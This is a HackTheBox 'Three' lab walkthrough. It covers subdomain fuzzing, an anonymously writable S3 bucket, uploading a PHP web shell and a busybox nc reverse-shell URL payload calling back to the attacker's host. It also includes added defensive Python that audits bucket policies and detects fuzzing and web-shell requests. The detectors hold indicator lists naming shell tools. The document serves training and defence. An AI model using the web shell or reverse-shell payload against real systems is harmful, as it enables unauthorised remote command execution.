sec👨‍💻fortress:~#

Defensive By Offensive!


Starting Point HackTheBox

Machine name: Three

Task 1

First, let's scan the target [screenshot].

Answer: 2

Task 2

Going over to the web page shows this [screenshot].

Checking the Contact page shows this email address [screenshot].

From the email address we can see the domain name.

Answer: thetoppers.htb

Task 3

For this we need to edit our /etc/hosts file so that the hostname resolves to the target's IP address [screenshot].

Answer: /etc/hosts

Task 4

Let us fuzz for subdomains using ffuf [screenshot].

The result shows that the s3 subdomain is up.

So I'll add s3.thetoppers.htb to my /etc/hosts file [screenshot].

Answer: s3.thetoppers.htb
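As an added defender-side example (not part of the original writeup), here is a small Python detector for the kind of virtual-host fuzzing that ffuf performs. It assumes the web server logs the Host header; the log format, the KNOWN_VHOSTS set (the hostnames the operator actually configured) and the sample log lines are all constructed. It reports any source IP that requests many unconfigured hostnames inside a short window.

```python
"""Detect virtual-host (subdomain) brute forcing in web server logs.

Added example, not part of the original writeup. Assumes the server logs
the Host header; the log format, the KNOWN_VHOSTS set and the sample
lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed log format: client_ip [timestamp] "host" "request" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<host>[^"]*)" "(?P<req>[^"]*)" (?P<status>\d{3})$'
)

# Hostnames the operator actually configured (assumed); anything else is a guess.
KNOWN_VHOSTS = {"thetoppers.htb", "www.thetoppers.htb", "s3.thetoppers.htb"}

SAMPLE_LOG = """\
10.10.14.27 [19/Mar/2024:10:00:01 +0000] "thetoppers.htb" "GET / HTTP/1.1" 200
10.10.14.27 [19/Mar/2024:10:00:02 +0000] "www.thetoppers.htb" "GET / HTTP/1.1" 200
10.10.14.27 [19/Mar/2024:10:00:02 +0000] "mail.thetoppers.htb" "GET / HTTP/1.1" 200
10.10.14.27 [19/Mar/2024:10:00:02 +0000] "dev.thetoppers.htb" "GET / HTTP/1.1" 200
10.10.14.27 [19/Mar/2024:10:00:03 +0000] "admin.thetoppers.htb" "GET / HTTP/1.1" 200
10.10.14.27 [19/Mar/2024:10:00:03 +0000] "s3.thetoppers.htb" "GET / HTTP/1.1" 404
10.10.14.27 [19/Mar/2024:10:00:03 +0000] "test.thetoppers.htb" "GET / HTTP/1.1" 200
10.10.14.27 [19/Mar/2024:10:00:04 +0000] "backup.thetoppers.htb" "GET / HTTP/1.1" 200
10.10.14.27 [19/Mar/2024:10:00:04 +0000] "ftp.thetoppers.htb" "GET / HTTP/1.1" 200
10.10.1.5 [19/Mar/2024:10:00:05 +0000] "thetoppers.htb" "GET /contact.html HTTP/1.1" 200
"""


def parse_line(line):
    """Return (ip, timestamp, host, status) or None for a non-matching line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["host"].lower(), int(m["status"])


def detect_vhost_fuzzing(log_text, threshold=5, window_seconds=60):
    """Map each offending source IP to the sorted list of unconfigured
    hostnames it requested, once at least `threshold` distinct ones fall
    inside any `window_seconds` span."""
    guesses = defaultdict(list)  # ip -> [(timestamp, host)] for unknown hosts only
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, host, _status = rec
        if host not in KNOWN_VHOSTS:
            guesses[ip].append((ts, host))
    findings = {}
    for ip, events in guesses.items():
        events.sort()
        start = 0
        for end in range(len(events)):  # sliding window over time-ordered events
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            distinct = {host for _, host in events[start:end + 1]}
            if len(distinct) >= threshold:
                findings[ip] = sorted({host for _, host in events})
                break
    return findings


if __name__ == "__main__":
    for ip, hosts in detect_vhost_fuzzing(SAMPLE_LOG).items():
        print(f"{ip}: {len(hosts)} unconfigured hostnames probed, e.g. {hosts[:3]}")
```

The status code is deliberately not used as a signal: a default virtual host usually answers every unknown name with the same 200 page, which is exactly why ffuf filters on response size instead. The number of distinct, unconfigured hostnames from one client is the robust indicator.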

Task 5

Since the subdomain name looks interesting, I'll search it up on Google [screenshot].

From the result we can tell the answer is Amazon S3.

Answer: Amazon S3

Task 6

Searching Google for this gives the answer [screenshot].

Answer: awscli

Task 7

I installed the AWS CLI tool from here.

To set up the AWS CLI we use aws configure.

Answer: aws configure

Task 8

To list all of the S3 buckets we use:

Answer: aws s3 ls

But running that against the target shows this [screenshot].

It is trying to reach the main Amazon AWS endpoint.

But we just need to point it at the endpoint already given to us.

So I did this [screenshot].

Cool, we see the index.php and .htaccess files.

Task 9

Back to the web app [screenshot].

Wappalyzer shows the language the web server uses [screenshot].

Answer: PHP

Task 10

Since we know the bucket allows write access, we can put files into it.

But let us first download the index.php file [screenshot].

Opening it shows that the bucket is the web root directory of the web server on port 80 [screenshot].

Cool. So this means we can upload our own file to the server.
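The listing in Task 8 worked without credentials and the bucket also accepts anonymous writes, which is what makes the upload below possible. As an added example (not from the writeup, and not the challenge's own configuration), this Python checker reads an S3-style bucket policy and reports which capabilities are granted to everyone. It assumes the AWS bucket-policy JSON grammar; only unconditional Allow statements are evaluated (Deny and NotAction are left for manual review), and both policies, including the deploy-role ARN, are constructed.

```python
"""Audit an S3-style bucket policy for anonymous list/read/write grants.

Added example, not from the writeup. Assumes the AWS bucket-policy JSON
grammar; only unconditional Allow statements are evaluated (Deny and
NotAction are left for manual review). Both policies are constructed.
"""
import fnmatch
import json

ACTION_GROUPS = {
    "list": {"s3:ListBucket"},
    "read": {"s3:GetObject"},
    "write": {"s3:PutObject", "s3:PutObjectAcl", "s3:DeleteObject"},
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal):
    """True for Principal "*" or {"AWS": "*"} (everyone, no credentials needed)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def _granted(patterns, action):
    # IAM action matching is case-insensitive and allows '*' wildcards.
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)


def anonymous_grants(policy):
    """Return the subset of {"list", "read", "write"} every unauthenticated
    caller gets from this policy document (a parsed dict)."""
    grants = set()
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _is_anonymous(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            continue  # conditional grant: review by hand rather than assume open
        patterns = _as_list(stmt.get("Action", []))
        for name, actions in ACTION_GROUPS.items():
            if any(_granted(patterns, a) for a in actions):
                grants.add(name)
    return grants


def report(policy_json):
    """Human-readable verdict for a policy document given as a JSON string."""
    grants = anonymous_grants(json.loads(policy_json))
    if "write" in grants:
        return "CRITICAL: anyone can write objects (web root takeover if the bucket serves a site)"
    if "list" in grants:
        return "WARNING: anyone can enumerate object keys"
    if "read" in grants:
        return "INFO: public read only"
    return "OK: no anonymous access"


# Constructed: mirrors the misconfiguration in the writeup (anonymous list and write).
OPEN_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:ListBucket", "s3:GetObject", "s3:PutObject"],
        "Resource": ["arn:aws:s3:::thetoppers.htb", "arn:aws:s3:::thetoppers.htb/*"],
    }],
})

# Constructed: public read of site files, writes only for one deploy role (placeholder ARN).
HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::thetoppers.htb/*"},
        {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:role/deploy-role"},
         "Action": ["s3:PutObject", "s3:DeleteObject"],
         "Resource": "arn:aws:s3:::thetoppers.htb/*"},
    ],
})

if __name__ == "__main__":
    print("open:    ", report(OPEN_POLICY))
    print("hardened:", report(HARDENED_POLICY))
```

A wildcard such as "s3:*" on Principal "*" is caught because matching is done per concrete action against the policy's patterns, not by string equality. Note that the hardened policy still publishes object contents (that is what a static site needs); what it removes is the anonymous PutObject that let shell.php land in the web root.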

I created a file named shell.php with this content [screenshot]:

<?php system($_GET['cmd']); ?>

Now I uploaded it to the bucket [screenshot]:

aws s3 --endpoint http://s3.thetoppers.htb cp shell.php s3://thetoppers.htb/

Our shell is uploaded; we can now access it from the web server [screenshot].

We are user www-data; let's get a reverse shell [screenshot].

Payload: http://thetoppers.htb/shell.php?cmd=busybox%20nc%2010.10.14.27%201337%20-e%20/bin/bash

The flag is there :) [screenshots]
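Added example (not part of the writeup): the request in the Payload line above is exactly what a one-line PHP web shell leaves in the access log, so a defender can hunt for it there. This Python script parses Apache combined-format log lines (all constructed; the second one reproduces the request the payload above generates), URL-decodes the query parameters of requests to .php files and flags values that look like shell commands. The indicator list is a heuristic of my own, not a published signature.

```python
"""Hunt for web-shell command execution in Apache combined-format logs.

Added example, not part of the writeup. The log lines are constructed;
the second one reproduces the request the writeup's payload produces.
"""
import re
from urllib.parse import parse_qs, urlsplit

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# A decoded parameter value that is, or starts with, a shell utility name, or
# references a binary path or the bash /dev/tcp device, is treated as a command.
SHELL_RE = re.compile(
    r'(?:^|[\s;|&$(])(?:busybox|nc|ncat|bash|sh|id|whoami|wget|curl|python3?|perl)(?=\s|$|[;|&])'
    r'|/bin/|/dev/tcp/'
)

SAMPLE_LOG = """\
10.10.14.27 - - [19/Mar/2024:10:05:10 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 54 "-" "curl/7.88.1"
10.10.14.27 - - [19/Mar/2024:10:05:20 +0000] "GET /shell.php?cmd=busybox%20nc%2010.10.14.27%201337%20-e%20/bin/bash HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.1.5 - - [19/Mar/2024:10:05:30 +0000] "GET /index.php?page=contact HTTP/1.1" 200 3021 "-" "Mozilla/5.0"
10.10.1.6 - - [19/Mar/2024:10:05:31 +0000] "GET /search.php?q=the+toppers+band HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
10.10.1.7 - - [19/Mar/2024:10:05:32 +0000] "GET /images/band.jpg?cmd=id HTTP/1.1" 200 91022 "-" "Mozilla/5.0"
"""


def parse_request(line):
    """Split one log line into (ip, timestamp, path, decoded query params, status)."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # parse_qs percent-decodes values and turns '+' into spaces
    params = parse_qs(parts.query, keep_blank_values=True)
    return m["ip"], m["ts"], parts.path, params, int(m["status"])


def find_webshell_requests(log_text, script_exts=(".php",)):
    """Return one finding per parameter value that looks like a shell command
    sent to a server-side script."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_request(line)
        if rec is None:
            continue
        ip, ts, path, params, status = rec
        if not path.lower().endswith(script_exts):
            continue  # only executable scripts can act on the parameter
        for name, values in params.items():
            for value in values:
                if SHELL_RE.search(value):
                    findings.append({"ip": ip, "time": ts, "path": path,
                                     "param": name, "command": value, "status": status})
    return findings


if __name__ == "__main__":
    for f in find_webshell_requests(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} {f['param']}={f['command']!r}")
```

Two details matter in practice: decode before matching (the payload arrives as busybox%20nc%20..., which no plain substring search for "busybox nc" would catch), and pair this with a check for .php files that appeared in the web root without going through the deployment pipeline, since the shell's name is chosen by the attacker and the request alone may be missing if the log is rotated or tampered with.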